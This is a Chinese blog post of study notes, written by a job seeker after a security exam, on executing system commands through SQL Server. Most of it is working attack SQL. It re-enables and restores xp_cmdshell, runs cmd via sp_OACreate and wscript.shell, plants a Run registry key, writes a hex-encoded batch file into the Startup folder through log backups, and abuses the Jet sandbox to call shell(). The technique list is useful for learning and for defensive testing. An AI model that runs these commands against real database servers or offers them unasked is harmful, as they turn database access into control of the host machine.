通过SQLserver执行系统命令

已于 2023-01-02 16:23:56 修改
阅读量989 收藏 3
点赞数 2
分类专栏: SQLI 文章标签: sqlserver 数据库
于 2023-01-01 00:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/128495562
版权

前言

咋说呢,就是把,我最近找工作然后库库投校招的简历,然后呢,我接到了一个青藤云的笔试机会,哇!我激动的不行,然后我什么都没有准备的上线进行一波答题,答完总结下来,我就是个废物,还是有很多不会的,很多答不上来的,看来这家又是寄了,没办法只能上网把自己不会的充实一下,迎接其他公司的下一次笔试。这里是看了大佬的文章

[大数据]如何通过SQL Server执行系统命令?-码姐姐

方法一:xp_cmdshell 

exec master..xp_cmdshell "whoami"

默认情况下xp_cmdshell 是禁止的,这个时候,可以使用以下命令进行开启

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

如果xp_cmdshell被删除,可以尝试上传xplog70.dll进行恢复,恢复语句:

Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'

 方法二:SP_OACREATE

当xp_cmdshell 删除以后,可以使用SP_OACreate。首先要打开组件:

EXEC sp_configure 'show advanced options', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'Ole Automation Procedures', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'show advanced options', 0;

语句执行命令

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >d:\\temp\\1.txt'

这里要注意一下,此方式执行是无回显的

 方法三:自启动

以下方式需要电脑重启。添加注册表:

xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','exec','REG_SZ','ipconfig'

备份添加启动项:

alter database test set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)
create table cmd (a image)--  (新建立一个cmd表)
backup database test  to disk = 'D:\\temp\\cmd'  WITH init --
backup log test to disk = 'D:\\temp\\cmd1'  WITH init --  (减少备分数据的大小)
insert into cmd (a) values (0x0a406563686f206f66660d0a406563686f206f66660d0a40636d642e657865202f63206563686f2077686f616d69203e643a5c74656d705c332e7478740d0a40636d642e657865202f63206563686f2077686f616d69203e643a5c74656d705c332e7478740d0a400d0a40)
-- (插入cmd命令)
backup log test to disk = 'C:\\Documents and Settings\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat'-- (备分日志到启动路径)
drop table cmd --(删除新建的cmd表)
alter database test set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)

测试发现,Win10+MSSQL 2012导出的批处理并不能顺利执行,可能与系统及数据库版本有一定关系,成功率并不怎么高。

 方法四:通过沙盒执行命令

开启沙盒:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行命令:

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')

仲瑿
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
SQL Server 2005 定时执行SQL语句的方法
12-15
–我的电脑–控制面板–管理工具–服务–右键SQLSERVERAGENT–属性–启动类型–选择”自动启动”–确定. 2、SQL Server Management Studio — SQL Server 代理 — 作业 — 新建作业 作业设置如下: “常规” — 设置...
SQL Server 命令执行方式汇总
m0_60571990的博客
03-10 3027
SQL Server 命令执行方式汇总
SqlServer数据库脚本执行命令行指令
u013664054的专栏
11-18 3107
SqlServer数据库脚本执行命令行指令
SqlCommand的三大方法
weixin_42317631的博客
04-07 662
在学习.net时,经常看到sqlcommand和ExecuteNonQuery()等方法,在此记录下每个方法的作用
sqlserver数据库触发器调用外部exe
weixin_30610755的博客
08-15 723
sqlserver数据库触发器调用外部exe,同事可以选择参入参数! sqlserver使用master..xp_cmdshell 进行外部exe的执行。 使用master..xp_cmdshell 之前需要在据库中启用xp_cmdshell ,启用和关闭方式如下: --开启xp_cmdshell: exec sp_configure 'show advanced options',...
绕过杀软!SQL Server Transact-SQL 的无文件攻击姿势
qq_37341685的博客
08-04 718
背景概述 近日,深信服安全团队捕获到一起绕过杀毒软件的无文件攻击事件,被入侵的主机或服务器会被安装Mykings、Mirai、暗云等多种僵尸网络木马及挖矿程序,并且难以彻底清除。经分析排查,该木马通过弱口令爆破SQL Server服务器后,利用sqlserver Transact-SQL存储C#编译恶意代码,通过MSSQL作业定时执行存储过程,在受害主机下载恶意程序。 排查过程 排查主机上的恶意文件、启动项等,发现执行恶意脚本的WMI,功能是下载文件到本地执行: 排查注册表启动项,存在一个BGClient
库管理系统为SQL Server.zip
最新发布
04-17
SQL server专业术语 SQL Server 作为一个关系型数据库管理系统,涉及到一些专业术语。以下是几个常见的 SQL Server 专业术语的解释...通过使用查询语言(如 SQL),可以从表中检索特定的数据行或执行更复杂的数据操作。
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 提权基本思路过程与原理 1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员...
VC+SQL SERVER学生信息管理系统
05-30
(2)实例执行文件位置:\08\学生管理系统\源程序\Debug\mystudentsys.exe 操作流程 运行本系统,请按照以下流程操作: (1)在“基础信息管理”中的“科室信息管理”、“科目信息管理”、“教师信息管理”、“班级...
sql server代码.zip
04-17
SQL server专业术语 SQL Server 作为一个关系型数据库管理系统,涉及到一些专业术语。以下是几个常见的 SQL Server 专业术语的解释...通过使用查询语言(如 SQL),可以从表中检索特定的数据行或执行更复杂的数据操作。
sql server远程执行cmd命令
08-18
这是用C#Winfrom写的一个小工具,利用sqlserver中的master数据库中的xp_cmdshell远程执行cmd命令。
python 读取sql server 日志_网安备忘录|Mssql数据库命令执行总结
weixin_39911916的博客
12-11 498
原标题:网安备忘录|Mssql数据库命令执行总结0x00 简介本文的攻击场景如下: 演示环境的利用场景: 本文将要介绍以下内容:xp_cmdshell利用COM组件利用CLR利用SQL Server 2016 R利用SQL Server 2017 Python利用沙盒利用(openrowset)Agent Job利用0x01 xp_cmdshell利用前提条件:Mssql数据库服务未降权已获取到数...
SQL Shell常用的指令
weixin_46653974的博客
08-08 570
1、\c或\connect :连接到数据库。12、\s或\set:设置SQL Shell的变量。6、\i或\include:从文件中执行SQL指令。11、\timing:启用\禁止查询执行时间的显示。16、\x或\X:切换输出模式为扩展模式,以便更好地显示复杂的查询结果。10、\h或\help:显示SQL Shell的帮助信息。8、\g或\gexec:执行当前输入的SQL命令。7、\e或\edit:编辑当前输入的SQL命令。4、\l或\list:显示所有数据库的列表。2、\d或\dt :显示数据库中的表。
使用shell脚本连接数据库
qq_45229597的博客
09-13 4853
shell脚本操作数据库如下。
绿色SQL Server原理(1)Sqlservr.exe 运行参数
shaoqiang的专栏
07-12 3741
Sql Server的启动可以为Windows服务方式(默认),也可以以应用程序方式启动。下面介绍sqlservr.exe以应用程序方式启动时的参数问题。  sqlservr 应用程序用法:  sqlservr [-sinstance_name] [-c] [-dmaster_path] [-f] [-eerror_log_path] [-lmaster_log_path] [
SQLserver执行命令
weixin_30654583的博客
06-13 2954
方法一:xp_cmdshell exec master..xp_cmdshell "whoami"默认执行是关闭 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 将1修改为0则为关闭 xp_cmdshell 被删除可采用xp...
Sqlserver cmd执行sql
L_CSyLYH的博客
03-25 2009
sqlserver 命令执行sql
Shell脚本变量、脚本编写和执行(部署Apache与远程备份MySQL数据库
XinCenWeiSei的博客
05-12 468
1、Shell脚本基础 (1)查看Shell脚本种类,使用/bin/bash [root@localhost ~]# cat /etc/shells /bin/sh /bin/bash ...... (2)创建一个Shell脚本 vim first.sh (新建first.sh文件) #!/bin/bash (特殊脚本说明) #This...
sqlserver命令注入和getshell
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-12 951
SqlServer基本注入需要知道的知识: 1、MSSql的系统自带数据库:master 2、在网站中,同一个网站一般不会跨库。 3、MSSql中每一个库都有一个系统自带表:sysobjects(这是系统对象表,保存当前数据库的对象) 4、注意sysobjects中的三个字段:NAME、XTYPE、ID NAME字段是表名信息;
sql server 执行系统命令的函数
06-02
在 SQL Server 中,可以使用 `xp_cmdshell` 存储过程来执行系统命令。`xp_cmdshell` 存储过程可以在 SQL Server 中执行一些外部命令,比如操作系统级别的命令。 使用 `xp_cmdshell` 存储过程执行系统命令的基本语法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值